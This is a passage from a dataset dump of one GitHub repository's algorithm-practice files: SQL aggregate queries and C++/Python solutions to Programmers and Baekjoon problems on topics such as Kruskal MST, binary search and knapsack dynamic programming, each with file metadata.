"6883bacb77ec99553e8a6f482034b9e66b9cf762", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 651, "license_type": "no_license", "max_line_length": 85, "num_lines": 36, "path": "/programmers/SQL/SUM, MAX, MIN.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# SUM, MAX, MIN\n\n**[1. 최댓값 구하기 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59415)**\n\n```sql\nSELECT MAX(DATETIME)\nFROM ANIMAL_INS\n```\n\n<br/>\n\n**[2. 최솟값 구하기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59038)**\n\n```sql\nSELECT MIN(DATETIME)\nFROM ANIMAL_INS\n```\n\n<br/>\n\n**[3. 동물 수 구하기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59406)**\n\n```sql\nSELECT COUNT(*)\nFROM ANIMAL_INS\n```\n\n<br/>\n\n**[4. 
중복 제거하기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59408)**\n\n```sql\nSELECT COUNT(DISTINCT NAME)\nFROM ANIMAL_INS\nWHERE NAME IS NOT NULL\n```\n" }, { "alpha_fraction": 0.36057692766189575, "alphanum_fraction": 0.40224358439445496, "avg_line_length": 14.625, "blob_id": "c5ebc3cafc0f8a338cf9eb5e94fbabd07af7026c", "content_id": "2c3abd2d2eec2dccf6a1907a2300750f9eba04fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 626, "license_type": "no_license", "max_line_length": 58, "num_lines": 40, "path": "/BOJ/Mathematics/13251.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 13251번: 조약돌 꺼내기\nDATE: 2022-06-28\n*/\n#include <iostream>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int m, k, sum = 0;\n double ans = 0;\n\n cin >> m;\n \n int arr[m];\n \n for(int i = 0 ; i < m ; i++) {\n cin >> arr[i];\n sum += arr[i];\n }\n\n cin >> k;\n\n for(int i = 0 ; i < m ; i++){\n double a = 1, b = 1;\n\n for(int j = 0 ; j < k ; j++) {\n a *= arr[i] - j;\n b *= sum - j;\n }\n\n ans += (double)a / b;\n }\n\n cout << fixed;\n cout.precision(20);\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.46327683329582214, "alphanum_fraction": 0.48775893449783325, "avg_line_length": 20.260000228881836, "blob_id": "bf4836b75709a009c9b83db9ea16769d83a180ec", "content_id": "0ffd59f5432082adb8f7ec7cc8dfdfceaa43be6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1102, "license_type": "no_license", "max_line_length": 61, "num_lines": 50, "path": "/BOJ/Two Pointer/2461.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2461번: 대표 선수\nDATE: 2022-01-18\nTwo pointer\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<pair<int,int>> total;\n int n, m, input;\n int start, end, diff, classNum = 0;\n int min = 1e9;\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < m ; j++){\n cin >> input;\n total.push_back({input, i});\n }\n }\n\n sort(total.begin(), total.end());\n\n start = 0; end = 0;\n vector<int> check(n);\n\n while(end < n * m) {\n // 한 반에서 한 명씩 선발될 때까지 end 증가\n if(check[total[end].second] == 0) classNum++;\n check[total[end].second]++;\n end++;\n\n while(classNum == n){ \n diff = total[end - 1].first - total[start].first;\n if(diff < min) min = diff;\n \n check[total[start].second]--;\n if(check[total[start].second] == 0) classNum--;\n start++;\n }\n }\n\n cout << min;\n\n return 0;\n}" }, { "alpha_fraction": 0.34694793820381165, "alphanum_fraction": 0.36849191784858704, "avg_line_length": 22.712766647338867, "blob_id": "7d016c9f2eed355a1a1fde5077bd50e4affdc21e", "content_id": "6eb8efaa226b3d228544abd0a535c560f7d023d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2258, "license_type": "no_license", "max_line_length": 134, "num_lines": 94, "path": "/programmers/Level 2/open_chat_room.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "//programmers Level 2 : Open chat room\n//2019 KAKAO BLIND RECRUITMENT\n//2021-05-27\n#include <string>\n#include <vector>\n#include <map>\n#include <iostream>\nusing namespace std;\n\nvector<string> solution(vector<string> record) {\n vector<string> answer;\n map<string, string> m;\n string tmp, command, id, name, str;\n int 
cnt=0;\n \n for(int i = 0 ; i < record.size() ; i++){\n for(int j = 0 ; j < record[i].length() ; j++){\n if(record[i][j] == ' '){\n if(cnt == 0)\n command = tmp;\n else if(cnt == 1)\n id = tmp;\n \n cnt++;\n tmp = \"\";\n }\n else{\n tmp += record[i][j];\n }\n\n if(j == record[i].length() - 1){\n name = tmp;\n tmp = \"\";\n }\n }\n cnt = 0;\n\n if(command == \"Leave\")\n continue;\n \n m[id] = name;\n }\n\n for(int i = 0 ; i < record.size() ; i++){\n for(int j = 0 ; j < record[i].length() ; j++){\n if(record[i][j] == ' '){\n if(cnt == 0)\n command = tmp;\n else if(cnt == 1)\n id = tmp;\n \n cnt++;\n tmp = \"\";\n }\n else{\n tmp += record[i][j];\n }\n\n if(j == record[i].length() - 1){\n if(command == \"Leave\")\n id = tmp;\n else\n name = tmp;\n \n tmp = \"\";\n }\n }\n \n cnt = 0;\n\n if(command == \"Enter\"){\n str = m[id] + \"님이 들어왔습니다.\";\n answer.push_back(str);\n }\n else if(command == \"Leave\"){\n str = m[id] + \"님이 나갔습니다.\";\n answer.push_back(str);\n }\n \n }\n \n return answer;\n}\n\nint main(){\n vector<string> record = {\"Enter uid1234 Muzi\", \"Enter uid4567 Prodo\",\"Leave uid1234\",\"Enter uid1234 Prodo\",\"Change uid4567 Ryan\"};\n vector<string> answer = solution(record);\n\n for(int i = 0 ; i < answer.size() ; i++){\n cout << answer[i] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4522058963775635, "alphanum_fraction": 0.4742647111415863, "avg_line_length": 17.90277862548828, "blob_id": "0f48290bfccd529945d7044152b50ec93a61f36d", "content_id": "906cb70c18350b244faf17bf1725cda723bb084e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1368, "license_type": "no_license", "max_line_length": 58, "num_lines": 72, "path": "/BOJ/MST/6497.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 6497번: 전력난\n2022-01-04\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 200001\nusing namespace std;\n\nint parent[MAX];\nvector<pair<int,pair<int,int>>> edge;\n\nint getParent(int x){\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent[x]);\n}\n\nvoid unionParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a == b) return 1;\n else return 0;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int m, n;\n int x, y, z;\n\n while(1){\n cin >> m >> n;\n if(!m && !n) break;\n\n int sum = 0, ans = 0;\n\n edge.clear();\n for(int i = 1 ; i <= m ; i++) parent[i] = i;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> x >> y >> z;\n edge.push_back({z, {x, y}});\n sum += z;\n }\n\n sort(edge.begin(), edge.end());\n\n for(int i = 0 ; i < edge.size() ; i++){\n int x = edge[i].second.first;\n int y = edge[i].second.second;\n int z = edge[i].first;\n\n if(findParent(x, y)) continue;\n unionParent(x, y);\n ans += z;\n }\n\n cout << sum - ans << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.47214484214782715, "alphanum_fraction": 0.4930362105369568, "avg_line_length": 18.95833396911621, "blob_id": "28bea1bac442e717c3b6ea8e4e6d4fc4bc5111e0", "content_id": "d1db20d3bc93e3a097b5b6d495e7af24c8cca801", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1518, "license_type": "no_license", "max_line_length": 58, "num_lines": 72, "path": "/BOJ/MST/1368.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 
1368번: 물대기\nDATE: 2022-02-11\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 301\nusing namespace std;\n\nvector<pair<int,pair<int,int>>> edge;\nint parent[MAX];\n\nint getParent(int x) {\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent[x]);\n}\n\nvoid unionParent(int a, int b) {\n a = getParent(a);\n b = getParent(b);\n\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int a, int b) {\n a = getParent(a);\n b = getParent(b);\n\n if(a == b) return 1;\n else return 0;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, input, ans = 0;\n cin >> n;\n\n for(int i = 1 ; i <= n ; i++) {\n cin >> input; // i번째 논에 우물을 팔 때 드는 비용\n edge.push_back({input, {0, i}}); // 0번 노드: 가상 노드\n }\n\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++) {\n cin >> input; // i번째 논과 j번째 논을 연결하는데 드는 비용\n if(input == 0) continue;\n edge.push_back({input, {i, j}});\n }\n }\n\n for(int i = 0 ; i <= n ; i++) parent[i] = i;\n\n sort(edge.begin(), edge.end());\n\n for(int i = 0 ; i < edge.size() ; i++) {\n int x = edge[i].second.first;\n int y = edge[i].second.second;\n int z = edge[i].first;\n\n if(!findParent(x, y)) {\n unionParent(x, y);\n ans += z;\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.3570391833782196, "alphanum_fraction": 0.41219156980514526, "avg_line_length": 18.16666603088379, "blob_id": "d2eaf82b967fa27e4bedd7b8065b9db63511007c", "content_id": "6be3db562cdce3dbcd0707bcb18e7ead89dd2acd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 751, "license_type": "no_license", "max_line_length": 72, "num_lines": 36, "path": "/BOJ/Dynamic Programming/12865.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 12865번: 평범한 배낭\nDATE: 2021-02-01\nDynamic Programming\n*/\n#include <iostream>\n\nusing namespace std;\nint arr[101][100001];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n \n int n, k;\n cin >> n >> k;\n \n int w[101], v[101];\n\n for(int i = 1 ; i <= n ; i++){\n cin >> w[i] >> v[i];\n }\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= k ; j++){\n if(w[i] > j) //기존의 최대 가치 유지\n arr[i][j] = arr[i-1][j]; \n else{ //(i번째 물건을 담을 때, 담지 않을 때) max 값 선택\n arr[i][j] = max(v[i] + arr[i-1][j - w[i]], arr[i-1][j]);\n }\n }\n }\n\n cout << arr[n][k];\n\n return 0;\n}" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5352941155433655, "avg_line_length": 21.733333587646484, "blob_id": "1a26e95777b36efe918b3626148b308fc0e34398", "content_id": "b40ba42ee8bef77730eda14b6aeeb1acb264dddc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 352, "license_type": "no_license", "max_line_length": 44, "num_lines": 15, "path": "/programmers/Level 2/phone_book.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 2: 전화번호 목록\n# date: 2022-06-11\ndef solution(phone_book):\n answer = True\n \n phone_book.sort()\n str = phone_book[0]\n \n for i in range(1, len(phone_book)):\n if str == phone_book[i][0:len(str)]:\n answer = False\n break\n else: str = phone_book[i]\n \n return answer" }, { "alpha_fraction": 0.4039735198020935, "alphanum_fraction": 0.43841060996055603, "avg_line_length": 16.18181800842285, "blob_id": "92af69fa9a8f9ad904fe2fa3f903b6140eae2ab3", "content_id": "b2d405bd7e0c9894f53fbe5f45f75ce7950744eb", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "C++", "length_bytes": 767, "license_type": "no_license", "max_line_length": 58, "num_lines": 44, "path": "/BOJ/Binary Search/1654.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1654번: 랜선 자르기 \nDATE: 2021-03-23\nBinary Search\n*/\n#include <iostream>\n#define MAX \nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int k, n;\n long long start, end, mid, sum=0, total, max=-1;\n cin >> k >> n;\n\n int length[k];\n\n for(int i = 0 ; i < k ; i++){\n cin >> length[i];\n sum += length[i];\n }\n\n start = 1;\n end = sum / n; \n\n while(end - start >= 0){\n total = 0;\n mid = (start + end) / 2;\n\n for(int i = 0 ; i < k ; i++){\n total += length[i] / mid;\n }\n\n if(total >= n){\n start = mid + 1;\n if(mid > max) max = mid;\n }\n else end = mid - 1;\n }\n\n cout << max;\n\n return 0;\n}" }, { "alpha_fraction": 0.3827160596847534, "alphanum_fraction": 0.40740740299224854, "avg_line_length": 14.8695650100708, "blob_id": "32fb1596f5ac7d8516dbb33ea74337199156d732", "content_id": "cd971e38d7c61ea2362e791486cf496b570fd37e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 741, "license_type": "no_license", "max_line_length": 58, "num_lines": 46, "path": "/BOJ/Implementation/17413.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 17413번: 단어 뒤집기 2\nDATE: 2022-06-06\n*/\n#include <iostream>\n#include <stack>\nusing namespace std;\n\nstack<char> s;\n\nvoid print(){\n while(!s.empty()){\n cout << s.top();\n s.pop();\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str;\n bool flag = false;\n\n getline(cin, str);\n\n for(auto i : str){\n if(i == '<'){\n print();\n cout << i;\n flag = true;\n }\n else if(i == '>'){\n cout << i;\n flag = false;\n }\n else if(flag) cout << i;\n else if(i == ' ') {\n print();\n cout << \" \";\n }\n else s.push(i);\n }\n\n print();\n\n return 0;\n}" }, { "alpha_fraction": 0.3900589644908905, "alphanum_fraction": 0.42291492223739624, "avg_line_length": 23.75, "blob_id": "8f8ca213082d223aec82facccc76480750dd07dd", "content_id": "6f4110595ad2e621b1e765ca6320ba9731bd6af7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1199, "license_type": "no_license", "max_line_length": 71, "num_lines": 48, "path": "/programmers/Level 2/take_a_group_photo.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 단체사진 찍기\n2017 KAKAO CODE\nDATE: 2021-05-24\nUPDATE: 2022-03-26\n*/\n#include <vector>\n#include <algorithm>\n#include <string>\nusing namespace std;\n\nint solution(int n, vector<string> data) {\n int answer = 0;\n string str = \"ACFJMNRT\";\n\n do{\n bool flag = true;\n \n for(int i = 0 ; i < data.size() ; i++){\n char ch1 = data[i][0];\n char ch2 = data[i][2];\n \n int idx1 = find(str.begin(), str.end(), ch1) - str.begin();\n int idx2 = find(str.begin(), str.end(), ch2) - str.begin();\n \n int diff = abs(idx1 - idx2) - 1;\n int value = data[i][4] - '0';\n \n if(data[i][3] == '=' && diff != value){\n flag = false;\n break;\n }\n else if(data[i][3] == '>' && diff <= value){\n flag = false;\n break;\n }\n else if(data[i][3] == '<' && diff >= value){\n flag = false;\n break;\n }\n }\n \n if(flag) answer++;\n }\n while(next_permutation(str.begin(), str.end()));\n \n return answer;\n}" }, { "alpha_fraction": 0.47917962074279785, "alphanum_fraction": 0.5021752715110779, 
"avg_line_length": 23.029850006103516, "blob_id": "13db28ff83c21995f29018e0ce4cd76007b31559", "content_id": "e59d06cea86f52b748a9df94df26743c1e5592ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1659, "license_type": "no_license", "max_line_length": 83, "num_lines": 67, "path": "/BOJ/Implementation/3107.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ: 3107번: IPv6\n2021-12-28\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <string>\nusing namespace std;\n\nbool flag = false;\n\nvector<string> split(string str, string delimiter) {\n vector<string> result;\n size_t prev = 0, cur = str.find(delimiter);\n\n while(cur != string::npos) // find는 원하는 문자열을 찾지 못하면 npos를 반환한다.\n {\n \tstring sub_str = str.substr(prev, cur - prev); // 문자열 split\n result.push_back(sub_str);\n prev = cur + 1;\n cur = str.find(delimiter, prev);\n }\n result.push_back(str.substr(prev, cur - prev)); // 마지막 split\n\n if(str.find(\"::\") != string::npos) flag = true;\n\n return result;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str, ans;\n cin >> str;\n\n vector<string> result = split(str, \":\");\n vector<string> answer, tmp;\n\n if(result.size() != 8) {\n for(int i = 0 ; i < result.size() ; i++) {\n if(result[i].length() == 0 && flag) {\n for(int j = 0 ; j < 9 - result.size() ; j++) tmp.push_back(\"0000\");\n flag = false;\n }\n else tmp.push_back(result[i]);\n }\n\n result = tmp;\n }\n \n for(int i = 0 ; i < 8 ; i++) {\n if(result[i].length() < 4) {\n string tmp;\n\n for(int j = 0 ; j < 4 - result[i].length() ; j++) tmp += '0';\n tmp += result[i];\n\n answer.push_back(tmp);\n }\n else answer.push_back(result[i]);\n }\n \n for(int i = 0 ; i < 8 ; i++) ans += i == 7 ? 
answer[i] : answer[i] + \":\";\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4956217110157013, "alphanum_fraction": 0.5306479930877686, "avg_line_length": 15.342857360839844, "blob_id": "604dec291e0033d15d0c8a1c968eabba4f39df8c", "content_id": "b6f0dc3fa5ff56712e3f4838135fe91e584aef62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 581, "license_type": "no_license", "max_line_length": 84, "num_lines": 35, "path": "/BOJ/Implementation/11286.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "WINDOWS-1252", "text": "/*\nBOJ 11286¹ø: Àý´ñ°ª Èü\nDATE: 2021-01-07\n*/\n#include <iostream>\n#include <stdlib.h>\n#include <queue>\n#include <utility>\nusing namespace std;\n\nint main() {\n\tios_base::sync_with_stdio(0);\n\tcin.tie(0);\n\tint n, x;\n\tpriority_queue<pair<int, int>, vector<pair<int, int>>, greater<pair<int, int>>> pq;\n\t\n\tcin >> n;\n\n\tfor (int i = 0; i < n; i++) {\n\t\tcin >> x;\n\t\tint abs_x = abs(x);\n\n\t\tif (x != 0) {\n\t\t\tpq.push(make_pair(abs_x, x));\n\t\t}\n\t\telse if (x == 0) {\n\t\t\tif (pq.empty()) {\n\t\t\t\tcout << 0 << \"\\n\";\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tcout << pq.top().second << \"\\n\";\n\t\t\tpq.pop();\n\t\t}\n\t}\n}" }, { "alpha_fraction": 0.3082595765590668, "alphanum_fraction": 0.34365782141685486, "avg_line_length": 17.86111068725586, "blob_id": "a7be29d8879b39d91f3ea18fc3a39bc8b539ece3", "content_id": "92345999678df3f16407504c48bc5a7f694ba14d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 690, "license_type": "no_license", "max_line_length": 47, "num_lines": 36, "path": "/BOJ/Brute Force/2309.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2309번: 일곱 난쟁이\n2021-05-18\nBrute Force\n*/\n#include <iostream>\n#include <algorithm>\n#define n 9\nusing namespace std;\n\nint main(){\n int arr[n], sum=0;\n\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n sum += arr[i];\n }\n\n sort(arr, arr+n);\n\n for(int i = 0 ; i < n - 1 ; i++){\n for(int j = i + 1 ; j < n ; j++){\n if(sum - arr[i] - arr[j] == 100){\n for(int k = 0 ; k < n ; k++){\n if(i == k || j == k)\n continue;\n else\n cout << arr[k] << '\\n';\n }\n return 0;\n }\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3926829397678375, "alphanum_fraction": 0.43658536672592163, "avg_line_length": 16.84782600402832, "blob_id": "610b0ff506db6bd7ee187287194b3d483a5dda07", "content_id": "e7750c88234a08bf47611ffb70c1453202154ec7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 834, "license_type": "no_license", "max_line_length": 61, "num_lines": 46, "path": "/BOJ/Binary Search/16401.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 16401번: 과자 나눠주기\nDATE: 2022-06-04\nBinary Search\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nlong long arr[1000000];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n long long m, n, sum = 0;\n long long start, mid, end, cnt;\n long long ans = -1;\n\n cin >> m >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n sum += arr[i];\n }\n\n start = 0;\n end = sum;\n\n while(start <= end){\n cnt = 0;\n mid = (start + end) / 2;\n \n for(int i = 0 ; i < n ; i++){\n if(arr[i] >= mid && mid > 0) cnt += arr[i] / mid;\n }\n\n if(cnt >= m) {\n start = mid + 1;\n ans = max(ans, mid);\n }\n else end = mid - 1;\n }\n\n cout << (ans == -1 ? 
0 : ans);\n\n return 0;\n}" }, { "alpha_fraction": 0.47205883264541626, "alphanum_fraction": 0.5014705657958984, "avg_line_length": 19.02941131591797, "blob_id": "cc740af8010f4e460d913ad4b9e3471e19f34a4a", "content_id": "9dcbe654943dd82725ffdce777a7dc18e0de26b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 752, "license_type": "no_license", "max_line_length": 89, "num_lines": 34, "path": "/BOJ/Binary Search/10816.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10816번: 숫자 카드 2 \n2021-12-19\n*/\n#include <iostream>\n#include <algorithm>\n#include <vector>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> v, ans;\n int n, m, num;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n v.push_back(num);\n }\n \n sort(v.begin(), v.end());\n\n cin >> m;\n\n for(int i = 0 ; i < m ; i++) {\n cin >> num;\n auto upper = upper_bound(v.begin(), v.end(), num); // 처음으로 value값을 초과하는 원소의 주소\n auto lower = lower_bound(v.begin(), v.end(), num); // value값 보다 크거나 같은 첫번째 원소의 주소\n\n cout << upper - lower << \" \";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.48110830783843994, "alphanum_fraction": 0.513853907585144, "avg_line_length": 14.920000076293945, "blob_id": "a0ecea6ea3ff0a06a627e60c42b1b8e46ee1a0a3", "content_id": "aa851e9b106db1c874605c3ee8cfc965b0a59fdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 401, "license_type": "no_license", "max_line_length": 46, "num_lines": 25, "path": "/programmers/Level 2/carpet.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 카펫\n2021-12-27\n*/\n#include <string>\n#include <vector>\n\nusing namespace std;\n\nvector<int> solution(int brown, int yellow) {\n vector<int> answer;\n int h = 3, w;\n \n while(1) {\n w = (brown + yellow) / h;\n \n if((h - 2) * (w - 2) == yellow) break;\n h++;\n }\n \n answer.push_back(w);\n answer.push_back(h);\n \n return answer;\n}" }, { "alpha_fraction": 0.3636363744735718, "alphanum_fraction": 0.44727271795272827, "avg_line_length": 17.366666793823242, "blob_id": "3b9280052cf853e8920592923cd4352c3862813d", "content_id": "2155f1a194b6decd97125c16430e05a3df7e2ddb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 564, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/BOJ/Dynamic Programming/1003.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1003번: 피보나치 함수\nDATE: 2021-05-28\nDynamic programming\n*/\n#include <iostream>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int cnt0[41]={0,}, cnt1[41]={0,};\n int tc;\n cin >> tc;\n\n cnt0[0] = 1;\n cnt1[1] = 1;\n\n for(int i = 2 ; i <= 40 ; i++){\n cnt0[i] = cnt0[i - 2] + cnt0[i - 1];\n cnt1[i] = cnt1[i - 2] + cnt1[i - 1];\n }\n\n for(int i = 0 ; i < tc ; i++){\n int n;\n cin >> n;\n cout << cnt0[n] << \" \" << cnt1[n] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.48469093441963196, "alphanum_fraction": 0.5049104690551758, "avg_line_length": 20.92405128479004, "blob_id": "cfe27d97df84310cd30130c60b8b469b30df886a", "content_id": "578c68dbd06201988743ce22be491bd23c995643", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1741, "license_type": "no_license", "max_line_length": 99, "num_lines": 79, "path": 
"/BOJ/MST/2887.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2887번: 행성 터널\n2022-01-04\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 100001\nusing namespace std;\n\nvector<pair<int,int>> c_x, c_y, c_z;\nvector<pair<int, pair<int,int>>> edge;\nint parent[MAX];\n\nint getParent(int x){\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent[x]);\n}\n\nvoid unionParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a == b) return 1;\n else return 0;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n int x, y, z;\n int ans = 0;\n cin >> n;\n\n vector<int> c(n);\n\n for(int i = 0 ; i < n ; i++) {\n cin >> x >> y >> z;\n c_x.push_back({x, i});\n c_y.push_back({y, i});\n c_z.push_back({z, i});\n }\n\n sort(c_x.begin(), c_x.end());\n sort(c_y.begin(), c_y.end());\n sort(c_z.begin(), c_z.end());\n\n for(int i = 1 ; i < n ; i++) {\n edge.push_back({abs(c_x[i - 1].first - c_x[i].first), {c_x[i - 1].second, c_x[i].second}});\n edge.push_back({abs(c_y[i - 1].first - c_y[i].first), {c_y[i - 1].second, c_y[i].second}});\n edge.push_back({abs(c_z[i - 1].first - c_z[i].first), {c_z[i - 1].second, c_z[i].second}});\n }\n\n sort(edge.begin(), edge.end());\n for(int i = 1 ; i <= n ; i++) parent[i] = i;\n\n for(int i = 0 ; i < edge.size() ; i++) {\n int a = edge[i].second.first;\n int b = edge[i].second.second;\n int c = edge[i].first;\n\n if(findParent(a, b)) continue;\n unionParent(a, b);\n ans += c;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4395604431629181, "alphanum_fraction": 0.4769230782985687, "avg_line_length": 20.690475463867188, "blob_id": "fa5354db9cc7d048bb29a145dd831f4e67b77ebf", "content_id": "a3a92d2553b418bc36110956914e6942a50aaf18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 918, "license_type": "no_license", "max_line_length": 66, "num_lines": 42, "path": "/programmers/Level 2/function_development.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 2: 기능개발\n//2021-10-05\n#include <queue>\n#include <vector>\n#include <iostream>\nusing namespace std;\n\nvector<int> solution(vector<int> progresses, vector<int> speeds) {\n vector<int> answer;\n queue<int> q;\n \n for(int i = 0 ; i < progresses.size() ; i++) {\n if((100 - progresses[i]) % speeds[i] == 0) \n q.push((100 - progresses[i]) / speeds[i]);\n else q.push((100 - progresses[i]) / speeds[i] + 1);\n }\n \n while(!q.empty()) {\n int cnt = 1;\n int cur = q.front();\n q.pop();\n \n while(cur >= q.front() && !q.empty()) {\n q.pop();\n cnt++;\n }\n \n answer.push_back(cnt);\n }\n \n return answer;\n}\n\nint main() {\n vector<int> answer = solution({93, 30, 55}, {1, 30, 5});\n\n for(int i = 0 ; i < answer.size() ; i++) {\n cout << answer[i] << \" \";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3855970799922943, "alphanum_fraction": 0.4175022840499878, "avg_line_length": 15.89230728149414, "blob_id": "3319a946283504ac11b3ce5b66857269cb9bf626", "content_id": "27e199fc1356a01be45a36168e667311c0ba2724", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1113, "license_type": "no_license", "max_line_length": 58, "num_lines": 65, "path": "/BOJ/BFS_DFS/11724.cpp", "repo_name": "yegyeom/Algorithm", 
